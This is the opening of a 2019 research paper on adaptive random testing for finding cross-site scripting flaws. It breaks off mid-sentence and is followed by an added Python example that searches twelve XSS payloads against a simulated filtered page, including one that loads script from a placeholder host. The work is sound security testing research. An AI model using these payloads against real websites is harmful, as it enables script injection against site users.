2019 26th Asia-Pacific Software Engineering Conference (APSEC)
DOI 10.1109/APSEC48747.2019.00018, 2640-0715/19/$31.00 ©2019 IEEE

Adaptive Random Testing for XSS Vulnerability

Chengcheng Lv1, Long Zhang2,3, Fanping Zeng1, and Jian Zhang2,3
1 School of Computer Science and Technology, University of Science and Technology of China, Hefei, China
2 State Key Laboratory of Computer Science, Institute of Software, Chinese Academy of Sciences, Beijing, China
3 University of Chinese Academy of Sciences, Beijing, China
Email: lvcc@mail.ustc.edu.cn, zlong@ios.ac.cn, billzeng@ustc.edu.cn, zj@ios.ac.cn

Abstract—XSS is one of the common vulnerabilities in web applications. Many black-box testing tools collect a large number of payloads and traverse them to find one that can be successfully injected, but they are not very efficient. Previous research has paid little attention to improving the efficiency of black-box testing for XSS vulnerabilities. To improve the efficiency of testing, we develop an XSS testing tool. It collects 6128 payloads and uses a headless browser to detect XSS vulnerabilities. With the adaptive random testing method, the tool can discover XSS vulnerabilities quickly. We conduct an experiment on 3 widely adopted open source vulnerable benchmarks and 2 real websites to evaluate the adaptive random testing method. The experimental results indicate that, compared with plain fuzzing, adaptive random testing reduces the number of attempts before a successful injection by more than 27.1%.

Keywords—XSS Vulnerability, Adaptive Random Testing, Fuzzing

I. INTRODUCTION

Cross-site scripting (XSS) is a well-known security vulnerability in web applications. In an XSS attack, attackers craft malicious content (typically a script) disguised as benign text so that it passes through a vulnerable web application.
When the web application runs, the victim's browser treats the malicious text as legitimate code of the application and inadvertently executes it [1]. In the report released by the Open Web Application Security Project (OWASP) [2] in 2017, XSS is listed as one of the top 10 web vulnerabilities.

For example, the PHP statement echo "<b>".$userName."</b>"; displays the user's name on the page. But when the user's name is "<script>alert('This is an XSS')</script>", the browser executes the user's name as part of the page and displays "This is an XSS" in a dialog window. Here, "<script>alert('This is an XSS')</script>" is called the XSS payload.

XSS vulnerabilities can be divided into the following three types [1]:

• Reflected XSS attack: Reflected XSS is the most basic type of XSS attack, also known as Type-I or non-persistent XSS. When the victim clicks on a link containing malicious text (most commonly in HTTP query parameters), the server script reflects the malicious text back into the response as code, and the victim's browser executes it.

• Stored XSS attack: Stored XSS, also known as Type-II or persistent XSS, is a variant of the cross-site scripting flaw that attackers can exploit to attack web applications. An attacker embeds malicious code into a vulnerable server through an application such as a forum, where it is stored permanently. When a victim visits the infected site, the malicious code is delivered to the victim as part of the web page.

• DOM based XSS attack: DOM based XSS, also known as Type-0 XSS, is a newer sub-class of reflected XSS. In a DOM based XSS attack, the malicious data never reaches the web server. Instead, it is handled entirely by JavaScript code on the client side.
There are many black-box testing tools for detecting XSS vulnerabilities. They do not know the internals of the web application and apply fuzzing techniques to its HTTP requests [3]. The approaches that detect XSS vulnerabilities are mainly divided into static and dynamic approaches [4]. The static approach detects XSS vulnerabilities by analyzing the response data. It is fast, but its false alarm rate is high and the alarms need to be confirmed manually. Therefore, the dynamic approach may be the better choice. It determines whether user input is being parsed as code from the behavior of the program at runtime. The dynamic approach detects XSS vulnerabilities more accurately, but consumes more time and resources. At the same time, a website may have many different URLs at risk of XSS, so it is difficult for tools to run a large number of test cases against each of them.

In this paper, we propose a dynamic detection tool that uses adaptive random testing (ART) [5] to detect XSS vulnerabilities in web applications. We found that invalid payloads fail to be injected because some keywords in them were filtered or converted, or because the payloads do not fit the injection context, so the browser cannot execute the malicious code. We have observed that effective payloads tend to cluster together. Moreover, invalid and effective payloads usually share some keywords, so a mutation of an invalid payload may result in a successful injection. Therefore, after a payload fails to be injected, we can measure the distance between the failed payload and the other payloads, and then select as the next payload the one most likely to be injected successfully, to find the vulnerability
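The selection loop described above, as an added example that is not the paper's tool and not its distance metric: the page gives only the idea (measure the distance from the failed payload to the others, then pick the next one), so this block uses the classical fixed-size-candidate-set ART rule (test the candidate farthest from every failed payload) together with an assumed Jaccard distance over a payload's keyword set. The twelve-entry payload pool, the keyword-blocklist filter in front of the unescaped echo (the PHP echo pattern from the text), and the regex that stands in for the headless-browser check are all constructed for illustration.

```python
"""Fixed-size-candidate-set adaptive random testing (FSCS-ART) over an XSS
payload pool.  Added example; not the paper's tool.  The keyword distance
(Jaccard over a token set), the twelve-entry pool and the simulated target
are assumptions constructed for illustration."""
import random
import re

# Constructed payload pool, standing in for the 6128 payloads the paper collects.
PAYLOADS = [
    "<script>alert(1)</script>",
    "<SCRIPT>alert(1)</SCRIPT>",
    "<script src=//x.example></script>",
    "<img src=x onerror=alert(1)>",
    "<svg onload=alert(1)>",
    "<body onload=alert(1)>",
    "<a href=javascript:alert(1)>x</a>",
    '"><script>alert(1)</script>',
    "'><img src=x onerror=alert(1)>",
    "<iframe srcdoc='<script>alert(1)</script>'>",
    "<details open ontoggle=alert(1)>",
    "<input autofocus onfocus=alert(1)>",
]

_TOKEN_RE = re.compile(r"[A-Za-z]+|[^A-Za-z\s]")


def tokens(payload: str) -> frozenset:
    """Keyword set of a payload: alphabetic runs and single punctuation characters, case-folded."""
    return frozenset(t.lower() for t in _TOKEN_RE.findall(payload))


def distance(a: str, b: str) -> float:
    """Assumed metric: Jaccard distance between keyword sets (0.0 identical, 1.0 disjoint)."""
    ta, tb = tokens(a), tokens(b)
    union = ta | tb
    return 0.0 if not union else 1.0 - len(ta & tb) / len(union)


# --- simulated target: a naive keyword filter in front of an unescaped echo --------
_BLOCKLIST = ("script", "onerror", "onload", "javascript")
_EXEC_RE = re.compile(r"<script\b|\son[a-z]+\s*=|javascript:", re.IGNORECASE)


def simulated_target(payload: str) -> str:
    """Assumed vulnerable page: delete blocklisted keywords, then echo the rest into
    the body unescaped, like echo "<b>".$userName."</b>"; in the text."""
    for word in _BLOCKLIST:
        payload = re.sub(word, "", payload, flags=re.IGNORECASE)
    return f"<html><body><b>{payload}</b></body></html>"


def oracle(payload: str) -> bool:
    """Stand-in for the headless-browser check: True if the rendered page still carries
    something a browser would execute (script tag, event-handler attribute, javascript: URL)."""
    return _EXEC_RE.search(simulated_target(payload)) is not None


# --- search strategies -------------------------------------------------------------
def random_search(pool, oracle, seed=0):
    """Baseline fuzzing: try the pool in a random order and stop at the first injection."""
    order = list(pool)
    random.Random(seed).shuffle(order)
    tried = []
    for candidate in order:
        tried.append(candidate)
        if oracle(candidate):
            break
    return tried


def art_search(pool, oracle, seed=0, candidates=10):
    """FSCS-ART: the first payload is random; afterwards draw `candidates` untried
    payloads and test the one whose minimum distance to every failed payload is
    largest.  Returns the payloads tried in order, ending with the first success
    (or the whole pool if nothing is injectable)."""
    rng = random.Random(seed)
    untried, tried, failed = list(pool), [], []
    while untried:
        if not failed:
            choice = rng.choice(untried)
        else:
            sample = rng.sample(untried, min(candidates, len(untried)))
            choice = max(sample, key=lambda c: min(distance(c, f) for f in failed))
        untried.remove(choice)
        tried.append(choice)
        if oracle(choice):
            break
        failed.append(choice)
    return tried


def mean_attempts(search, pool, oracle, trials=200):
    """Average number of payloads tried up to and including the first successful injection."""
    return sum(len(search(pool, oracle, seed=s)) for s in range(trials)) / trials


if __name__ == "__main__":
    print("effective payloads:", [p for p in PAYLOADS if oracle(p)])
    print("random order, mean attempts:", mean_attempts(random_search, PAYLOADS, oracle))
    print("ART,          mean attempts:", mean_attempts(art_search, PAYLOADS, oracle))
```

Only two of the twelve constructed payloads survive the blocklist (the ontoggle and onfocus handlers), which is the clustering the text describes; on a pool this small the averaged comparison is not meaningful and should not be read as reproducing the 27.1% figure, which comes from the paper's benchmarks. What the block shows is the selection rule itself: each failure narrows the next draw to candidates that share the fewest keywords with everything already rejected by the filter.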